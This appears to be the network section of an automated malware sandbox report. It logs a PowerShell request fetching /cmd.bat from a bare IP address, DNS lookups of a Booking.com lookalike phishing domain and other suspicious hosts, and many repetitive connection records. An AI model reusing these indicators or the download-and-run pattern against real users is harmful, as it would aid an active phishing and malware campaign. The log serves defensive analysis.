                Source: global trafficHTTP traffic detected: GET /cmd.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 92.255.85.2
                Source: global trafficDNS traffic detected: DNS query: roombedsrewiews.com
                Source: global trafficDNS traffic detected: DNS query: booking.roombedsrewiews.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: partner.booking.com
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
                Source: global trafficDNS traffic detected: DNS query: 261-nrz-371.mktoresp.com
                Source: global trafficDNS traffic detected: DNS query: zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com
                Source: global trafficDNS traffic detected: DNS query: siteintercept.qualtrics.com
                Source: global trafficDNS traffic detected: DNS query: adult-hub1990.cfd
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: unknownHTTP traffic detected: POST /report/v4?s=bJcQdV%2By96xgE00cfkyt12j0QXyQtoANrLzJR39j9MOY7XqnDsD0UfEiDp89JFOwU5Vwhdj1NoVIaorf4U4YFb1TUVJKT91JZH7pvadRX7Xxp7WahnqDwzJXDAcyX8pQWK843Ew0GGOphAEvW30%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 755Content-Type: application/reports+jsonOrigin: https://booking.roombedsrewiews.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJcQdV%2By96xgE00cfkyt12j0QXyQtoANrLzJR39j9MOY7XqnDsD0UfEiDp89JFOwU5Vwhdj1NoVIaorf4U4YFb1TUVJKT91JZH7pvadRX7Xxp7WahnqDwzJXDAcyX8pQWK843Ew0GGOphAEvW30%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92766fa3fcee43c3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85406&min_rtt=85397&rtt_var=18029&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1486&delivery_rate=35778&cwnd=232&unsent_bytes=0&cid=196ea3849ca17df2&ts=833&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qoH2SW19ZR9WQaL6cN39C4s53NeRYdKriY6rAVxTB4N4KpFMuyVpxd3H2%2Fk6dt7JFPX8Vkg86H3j88CKD28MAWsXPQy3i0acMyMtfxGxsSrkDvh%2FZlh9nLfBMGolViHmuZz%2FNDhes3b1K%2BFPlc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92766fab7b19f799-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85617&min_rtt=85602&rtt_var=18082&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1487&delivery_rate=35688&cwnd=252&unsent_bytes=0&cid=63f4945cb2db7bb3&ts=845&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICCF-RAY: 92766faedb0deeee-EWRalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICCF-RAY: 92766fb90c4c75e1-EWRalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4nuLOoeMFMtR4X5RAnMjqBf%2FH%2Fc86YqxDudCRG4hPU%2FSbdEJavoGOB1SRw56axVtYp0bsAg8AgDoz49ZEFVBoL1gN1DHuWS4H2Ka3T7dLK340ab626QdRNresQaY1YmaDQdgz2msgR4f65Dl3U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92766fbb88a4a62e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=86702&min_rtt=86679&rtt_var=18320&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1507&delivery_rate=35236&cwnd=252&unsent_bytes=0&cid=5a6d8bcf33f13150&ts=836&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: cloudflareCache-Control: max-age=14400Cf-Cache-Status: EXPIREDCF-RAY: 92766fbf58bd37a9-EWRalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 10:27:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: cloudflareCache-Control: max-age=14400Cf-Cache-Status: EXPIREDCF-RAY: 92766fbf5d3ac674-EWRalt-svc: h3=":443"; ma=86400
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
